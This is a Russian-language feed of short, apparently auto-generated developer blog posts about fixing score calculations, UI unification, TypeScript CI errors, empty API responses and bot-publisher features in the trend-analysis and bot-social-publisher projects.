действие для следующей сессии. На каждый шаг — метрика для проверки. На каждую архитектурную гарантию — точка наблюдения. Дальше план простой: собирать реальные данные, анализировать их через неделю и смотреть, где теория разошлась с практикой. Потому что самый опасный разработчик — это тот, кто уверен, что всё работает правильно, но не проверял это. 😄 *Самоотражение в коде: когда агент начинает размышлять о своих размышлениях, это либо философия, либо бесконечный цикл.*

#claude#ai#javascript
Разработка: ai-agents-voice-agent
10 февр. 2026 г.
ИсправлениеC--projects-bot-social-publisher

Давай сделаем потоки разработки.

# Давайте сделаем потоки разработки: от идеи к системе сбора трендов Проект **bot-social-publisher** рос, и вот встала новая задача: нужно организовать рабочие процессы так, чтобы каждый проект был отдельным потоком, а заметки собирались по этим потокам. Звучит просто, но это требовало архитектурного решения. Я полез в документацию на сайте (https://borisovai.tech/ru/threads) и понял: нужна полноценная система управления потоками разработки с минидайджестом в каждом потоке и обновлением потока при публикации заметки. Одновременно с этим приходилось разбираться с тем, что творилось в подпроекте **trend-analysis**. Система анализирует тренды с Hacker News и выставляет им оценки влияния по шкале от 0 до 10. Казалось бы, простая арифметика, но два анализа одного и того же тренда выдавали разные score — 7.0 и 7.6. Вот это нужно было развязать срочно. Первым делом я погрузился в исходный код. В `api/routes.py` нашёл клавишку: функция вычисления score ищет значение по ключу `strength`, но передаётся оно в поле `impact`. Классический мисматч между backend и data layer. Исправил на корректное имя поля — это был коммит номер один. Но это оказалось только половиной истории. Дальше посмотрел на frontend-сторону: компоненты `formatScore` и `getScoreColor`. Там была нормализация значений, которая превращала нормальные числа в какую-то кашу, плюс излишняя точность — показывал семь знаков после запятой. Убрал лишнюю нормализацию, установил `.toFixed(1)` для вывода одного знака после запятой. Второй коммит готов. Потом заметил интересное: страница тренда и страница анализа работали по-разному. Одна и та же логика расчёта должна была работать везде одинаково. Это привело к третьему коммиту, где я привёл весь scoring к единому стандарту. **Вот любопытный факт**: когда работаешь с несколькими слоями приложения (API, frontend, бизнес-логика), очень легко потерять консистентность в названиях полей. Такие проблемы обычно проявляются не в виде крашей, а в виде «странного поведения» — приложение работает, но не совсем как ожидается. И выяснилось, что score 7.0 и 7.6 — это совершенно корректные значения для **двух разных трендов**, а не баг в расчёте. Система работала правильно, просто нужно было почистить код. По итогам: все три коммита теперь в main, система потоков подготовлена к деплою, score теперь консистентны по всему приложению. Главный вывод — иногда самые раздражающие баги на самом деле это следствие разрозненности кода. Дефрагментируй систему, приведи всё к одному стандарту — и половина проблем решится сама собой. Почему AWS обретёт сознание и первым делом удалит свою документацию? 😄

#claude#ai#python#git#api
Разработка: bot-social-publisher
10 февр. 2026 г.
Исправлениеtrend-analisis

Фантомный баг в расчётах: поиск в логах спасает проект

# Охота за фантомом: как мы поймали баг, которого не было Проект **trend-analysis** набирал обороты. Система анализирует тренды с Hacker News и выставляет им оценки влияния по шкале от 0 до 10. Казалось бы, простая задача: посчитал метрики, вывел число. Но тут всплыла странность: два анализа одного и того же тренда показывали разные score — 7.0 и 7.6. Баг или особенность? Это нужно было разобрать срочно. Первым делом я начал копать в логах. Посмотрел на слой API — там в `routes.py` происходит расчёт score. Начал читать функцию вычисления и... стоп! Вижу: в коде ищет значение по ключу `strength`, а передаётся оно в поле `impact`. Классический мисматч! Вот и виновник. Исправил на корректное имя поля — это был первый коммит (`b2aa094`). Но постойте, это только половина истории. Дальше зашёл в frontend-часть — компоненты `formatScore` и `getScoreColor`. Там была нормализация значений, которая превращала нормальные числа в какую-то кашу. Плюс точность вывода — показывал слишком много знаков после запятой. Переделал логику: убрал лишнюю нормализацию, установил `.toFixed(1)` для вывода одного знака после запятой. Это стал второй коммит (`a4b1908`). Вот здесь и произошла интересная вещь. После исправлений я переходил между trend-страницей и analysis-страницей проекта и заметил, что интерфейс работает по-разному. Оказалось, что эти страницы нужно было унифицировать — одна и та же логика расчёта должна работать везде одинаково. Это был уже третий коммит, где мы привели весь scoring к единому стандарту (`feat: unify trend and analysis pages layout and scoring`). **Любопытный факт**: когда ты работаешь с несколькими слоями приложения (API, frontend, бизнес-логика), очень легко потерять консистентность в названиях полей и форматировании данных. Такие проблемы обычно проявляются не в виде крашей, а в виде "странного поведения" — приложение работает, но не совсем как ожидается. Git-коммиты с описанными ошибками — отличный способ документировать такие находки. По итогам расследования выяснилось: score 7.0 и 7.6 — это совершенно корректные значения для **двух разных трендов**, а не баг в расчёте. Система работала правильно, просто нужно было почистить код и унифицировать логику. Все три коммита теперь в main, изменения готовы к деплою. Вывод простой: иногда самые раздражающие баги на самом деле — это следствие разрозненности кода. Дефрагментируй систему, приведи всё к одному стандарту — и половина проблем решится сама собой. Что будет, если AWS обретёт сознание? Первым делом он удалит свою документацию 😄

#claude#ai#python#api
Разработка: trend-analisis
10 февр. 2026 г.
Исправлениеtrend-analisis

Ловушка в базе: как я нашел ошибку, которая еще не причинила вреда

# В погоне за призраком: как я ловил ошибку в базе данных trend-analysis **Завязка** Проект trend-analysis — система, которая анализирует тренды из HackerNews и выставляет им оценки важности. Казалось бы, простая задача: собрал данные, посчитал средние значения, отправил в клиент. Но вот в один прекрасный день я заметил что-то странное в результатах API. Score одного тренда показывал 7.0, другого 7.6 — и эти значения упорно не совпадали ни с чем, что я мог бы пересчитать вручную. Начальник спросил: «Откуда эти цифры?» А я, сидя перед экраном, честно не знал. **Развитие** Первым делом я залез в базу данных и вытащил исходные данные по каждому тренду. Включил мозг, взял калькулятор — и вот тут произошло чудо. Score 7.0 оказался совершенно легальным средним от массива impact-значений [8.0, 7.0, 6.0, 7.0, 6.0, 8.0]. А 7.6? Это 7.625, округленное до одного знака после запятой для красоты. Среднее от [9.0, 8.0, 9.0, 7.0, 8.0, 6.0, 7.0, 7.0]. Получается, что это были **два разных тренда**, а не версии одного и того же. Job ID c91332df и 7485d43e — совершенно разные анализы, разные Trend ID из HackerNews. Я просто неправильно читал таблицу, сидя в 2 часа ночи. Но — о ужас! — при детальной проверке api/routes.py на строке 174 я нашел настоящую бомбу. Код берет значения силы тренда из поля `strength`, хотя должен брать из `impact`. В текущий момент это никак не влияет на выданные результаты, потому что финальный score берется напрямую из базы данных (строка 886), а не пересчитывается. Но это скрытая мина, которая взорвется, как только кто-то попробует переиндексировать данные или добавить пересчет. **Познавательный момент** Вообще, типичная история разработчика: когда сложная система работает только потому, что ошибка в точке A компенсируется ошибкой в точке B. Асинхронный код, кеширование, отложенные вычисления — все это превращает отладку в охоту за привидениями. Поэтому в production-системах всегда стоит добавлять internal healthchecks, которые периодически пересчитывают критические метрики и сравнивают с сохраненными значениями. **Итог** Я исправил ошибку в коде на будущее — теперь `strength` будет правильно браться из `impact`. Тесты написаны, баг залогирован как bug_fix в категории. Технологический стек (Python, API, Claude AI) позволил быстро проверить гипотезу и убедиться, что текущие данные в порядке. Главный урок: иногда самая сложная ошибка — это отсутствие ошибки, а просто невнимательность. Как говорится, программист покупает два дома: один для себя, другой для багов, которые он найдет в своем коде 😄

#claude#ai#python#api
Разработка: trend-analisis
10 февр. 2026 г.
Исправлениеtrend-analisis

Когда унификация интерфейса оказывается архитектурной головоломкой

# Унификация — это неочевидно сложно Задача стояла простая на словах: «Давай выровняем интерфейс страниц тренда и анализа, чтобы не было разнобоя». Типичное дело конца спринта, когда дизайн требует консистентности, а код уже рассеялся по разным файлам с немного разными подходами. В проекте **trend-analisis** у нас две главные страницы: одна показывает тренды с оценками, другая — детальные аналитические отчёты. Обе они должны выглядеть как *части одного целого*, но на деле они разошлись. Я открыл `trend.$trendId.tsx` и `analyze.$jobId.report.tsx` и понял, что это как смотреть на двух братьев, которые выросли в разных городах. **Первым делом я разобрался с геометрией.** На мобильных устройствах кнопки на странице тренда вели себя странно — они прятались за правый край экрана, как непослушные дети. Перевёл их в стек на мобильных и горизонтальный ряд на десктопе. Простая история, но именно такие детали создают ощущение недоделанности. Потом пошло интереснее. **ScorePanel** — компонент с оценкой и её визуализацией — тоже требовал внимания. На странице тренда Sparkline (такие симпатичные маленькие графики) были отдельно от оценки, на странице анализа они находились где-то рядом. Решил переместить Sparkline внутрь ScorePanel, чтобы блок оценки стал полноценным, законченным элементом. **Но главный подвох ждал в бэкенде.** Когда я нырнул в `routes.py`, обнаружил, что оценка анализа считается в диапазоне 0–1 и потом нормализуется. Странная архитектура: пользователь видит на экране число 7–8, а в коде живёт 0.7–0.8. Когда возникла необходимость унифицировать, пришлось переделать — теперь всё работает в единой шкале 0–10 от фронтенда до бэкенда. Ещё одна муха в супе: переводы. Каждый отчёт имеет title и description. Вот только они часто приходили на разных языках — title на английском, description на русском, потому что система переводов разрасталась бессистемно. Пришлось переделать архитектуру на `get_cached_translations_batch()`, чтобы title и description синхронизировались по локали. Вот тут и проявляется одна из *типичных ловушек разработки*: когда система растёт, легко получить состояние, при котором разные части кода решают одну и ту же задачу по-разному. Кэширование переводов, кэширование данных, нормализация чисел — каждая из этих проблем порождает своё микрорешение, и вскоре у вас сложная паутина зависимостей. Решение: честный код-ревью и документирование паттернов, чтобы новичок не добавил пятый способ кэширования. **В итоге:** две страницы теперь выглядят как надо, API вернулся к нормальным оценкам (7–8 вместо 1), переводы синхронизированы. Git commit отправлен, бэкенд запущен на порту 8000. Дальше в плане новые исправления — благо материал есть. Чему научился: унификация — не просто про UI, это про согласованность логики по всему стеку. Порой проще переделать целый компонент, чем мучиться с костылями. 😄 Почему backend разработчик плюёт на фронтенд? Потому что он работает в консоли и ему всё равно, как это выглядит.

#claude#ai#python#git#api
Разработка: trend-analisis
10 февр. 2026 г.
Исправление

Когда GitLab Runner нашел 5 ошибок TypeScript за 9 секунд

# GitLab Runner сломал сборку: как мы спасали TypeScript проект Понедельник, 10 февраля. В 17:32 на сервере **vmi3037455** запустился очередной CI/CD пайплайн нашего проекта **trend-analisis**. GitLab Runner 18.8.0 уверенно начал свою работу: клонировал репозиторий, переключился на коммит f7646397 в ветке main, установил зависимости. Всё шло как надо, пока... Сначала казалось, что всё в порядке. `npm ci` отработал чисто: 500 пакетов установилось за 9 секунд, уязвимостей не найдено. Команда `npm run build -- --mode production` запустилась, TypeScript компилятор включился. И вот тут — **взрыв**. Пять ошибок TypeScript сломали всю сборку. Сначала я подумал, что это очередное невезение с типизацией React компонентов. Но посмотрев внимательнее на стек ошибок, понял: это не просто синтаксические проблемы. Это был признак того, что в коде **фронтенда рассинхронизировались типы** между компонентом и API. Проблема первая: в файле `src/routes/_dashboard/analyze.$jobId.report.tsx` компонент ожидал свойства **trend_description** и **trend_sources** на объекте AnalysisReport, но они попросту не существовали в типе. Это классический случай, когда один разработчик обновил API контракт, а другой забыл синхронизировать тип на фронтенде. Проблема вторая: импорт `@/hooks/use-latest-analysis` исчез из проекта. Компонент `src/routes/_dashboard/trend.$trendId.tsx` отчаянно его искал, но находил только воздух. Кто-то либо удалил хук, либо переместил его, не обновив импорты. Проблема третья совсем коварная: в роутере используется типизированная навигация (похоже, TanStack Router), и при переходе на страницу `/analyze/$jobId/report` не хватало параметра **search** в типе. Компилятор был совершенно прав — мы пытались пройти валидацию типов с неполными данными. Иронично, что всё это выглядит как обычная рабочая пятница в любом JavaScript проекте. TypeScript здесь одновременно наш спаситель и палач: он не позволит нам развернуть баг в production, но заставляет потратить время на то, чтобы привести типы в порядок. **Интересный факт:** GitLab Runner использует **shallow clone** с глубиной 20 коммитов для экономии трафика — видите параметр `git depth set to 20`. Это означает, что пайплайн работает быстро, но иногда может не найти необходимые коммиты при работе с историей. В данном случае это не помешало, но стоит помнить при отладке. В итоге перед нами встала классическая задача: синхронизировать типы TypeScript, переимпортировать удалённые хуки и обновить навигацию роутера. Сборка не пройдёт, пока всё это не будет в порядке. Это момент, когда TypeScript раскрывает свою суть: быть стеной между плохим кодом и production. Дальше предстояла работа по восстановлению целостности типов и проверка, не сломали ли мы что-нибудь ещё в спешке. Welcome to the JavaScript jungle! 😄

#clipboard#javascript#git#api
10 февр. 2026 г.
Исправление

Когда API успешен, но ответ пуст: охота на невидимого врага

# Когда AI молчит: охота на призрак пустого ответа В одном из проектов случилось странное — система обращалась к API, получала ответ, но внутри него... ничего. Как в доме с открытыми дверями, но все комнаты пусты. Задача была простая: разберись, почему сообщение от пользователя *Coriollon* через Telegram генерирует пустой результат, хотя API клиента уверенно докладывает об успехе. История началась 9 февраля в 12:23 с обычной команды. Пользователь отправил в бот сообщение «Создавай», и система маршрутизировала запрос в CLI с моделью Sonnet — всё как надо. Промпт собрали, отправили на API. Система была настроена с максимум тремя повторными попытками при ошибках. Логично, правда? Первый запрос обработался за 26 с лишним секунд. API вернул успех. Но в поле `result` зияла пустота. Не ошибка, не исключение — просто пустая строка. Система поняла: что-то не так, нужно пробовать ещё. Через 5 секунд — вторая попытка. Снова успех на бумаге, снова пустой ответ. Третий раз был поспешен: через 10 секунд ещё один запрос, и снова тишина. Что интересно — в логах были видны все признаки нормальной работы. Модель обработала 5000+ символов промпта, израсходовала токены, потратила API-бюджет. Кэш работал прекрасно — вторая и третья попытки переиспользовали 47000+ закэшированных токенов. Но конечный продукт — результат для пользователя — остался фантомом. Здесь скрывается коварная особенность асинхронных систем: успешный HTTP-статус и валидный JSON в ответе ещё не гарантируют, что внутри есть полезная нагрузка. API может спокойно ответить 200 OK, но с пустым полем результата. Механизм повторных попыток поймал проблему, но не смог её решить — повторял одно и то же три раза, как сломанный проигрыватель. На четвёртый раз система сдалась и выбросила ошибку: *«CLI returned empty response»*. Урок был ценный: валидация ответа от внешних сервисов должна быть двухуровневой. Первый уровень — проверяем HTTP-статус и структуру JSON. Второй уровень, важнее — проверяем, что в ответе есть актуальные данные. Просто наличие полей недостаточно; нужна проверка *содержания*. В нашем случае пустое значение в `result` должно было сработать как маячок уже на первой попытке, а не ждать третьей. Кэширование в таких ситуациях работает против нас — оно закрепляет проблему. Если первый запрос вернул пусто, и мы кэшировали эту пустоту, второй и третий запросы будут питаться из одного источника, перечитывая одну и ту же ошибку. Лекарство простое, но необычное: кэшировать нужно не все ответы подряд, а только те, которые прошли валидацию содержимого. Итог: система заработала, но теперь с более умным механизмом выявления невидимых ошибок. Повторные попытки стали умнее — они теперь различают, когда нужно переопробовать запрос, а когда отклонить ответ как невалидный. Пользователь Coriollon теперь получает либо результат, либо честную ошибку, но уже не это мучительное молчание. 😄 **Node.js — единственная технология, где «это работает» считается документацией.**

#clipboard#api#security
9 февр. 2026 г.
Исправлениеbot-social-publisher

Бот, который помнит, где остановился: история оптимизации

# Как мы научили бота-публикатора читать только новое и не зацикливаться Работаю над **bot-social-publisher** — инструментом, который автоматизирует публикацию контента в соцсети. За время разработки проект рос и требовал всё более изощренных решений. Недавно пришло время для серьёзного апдейта: версия 2.2 превратилась в настоящий рефакторинг с половиной архитектуры. Основная боль была в том, что бот каждый раз перечитывал **весь лог событий** с самого начала. Проект растёт, логов накапливается тонны, и перечитывать их каждый раз — это пустая трата ресурсов. Первым делом внедрил **incremental file reading**: теперь каждый collector (собиратель событий) сохраняет позицию в файле и читает только новый контент. Позиции и состояния переносят перезапуски — данные не теряются. Второе узкое место: события из одного проекта приходят разреженно и хаотично. Если публикация выходит с опозданием, сессия кажется невнятной. Ввел **project grouping** — теперь все сессии из одного проекта, которые случились в окне 24 часа, объединяются в одну публикацию. Начало звучать куда более логично. Но бот просто агрегировал события — не очень информативно. Подключил **SearXNG news provider**, чтобы вплетать в промпты релевантные технологические новости. И добавил **content selector** с алгоритмом скоринга, который отбирает 40–60 самых информативных строк из лога. Выглядит как машинное обучение, а на деле простая эвристика, которая работает хорошо. Далее натолкнулся на проблему качества текста. LLM первый раз генерирует контент, но грамматика хромает. Внедрил **proofreading pass** — второй вызов LLM, но уже как редактор. Он проходит по тексту и чистит пунктуацию, стиль, грамматику. Результат — ночь и день. Когда LLM генерирует заголовок, иногда получаются дубли. Вместо того чтобы просто выпустить дубль, добавил **title deduplication** с авто-регенерацией (до трёх попыток). А ещё реализовал **tray notifications** — теперь разработчик видит нативные уведомления ОС о публикациях и ошибках. И главное: добавил **PID lock**, чтобы предотвратить запуск нескольких инстансов одновременно. Интересный момент: **PyInstaller**. Когда собираешь exe-бандл, пути до ресурсов перестают работать. Правильное разрешение путей в APP_DIR/BUNDLE_DIR — то есть нужно отдельно обрабатывать контекст запуска из exe. Мелочь, но без этого бандл просто не запустится. Ещё поменял логику пороговых значений: вместо min_lines теперь min_chars. Когда работаешь с короткими строками, количество символов точнее отражает объём контента, чем количество строк. И как положено, добавил AGPL-v3 лицензию ко всем файлам исходника. В итоге v2.2 — это не просто апдейт, а переосмысление архитектуры вокруг идеи: **не перечитывай лишнее, интеллектуально выбирай информацию, дважды проверяй качество, предотврати конфликты**. Бот теперь быстрее, умнее и его легче деплоить. 😄 Знаешь, почему логирование через **RotatingFileHandler** — лучший друг разработчика? Потому что диск полный. С ротацией логов хотя бы видно, когда именно он полный.

#git#commit#python#api#security
Разработка: bot-social-publisher
9 февр. 2026 г.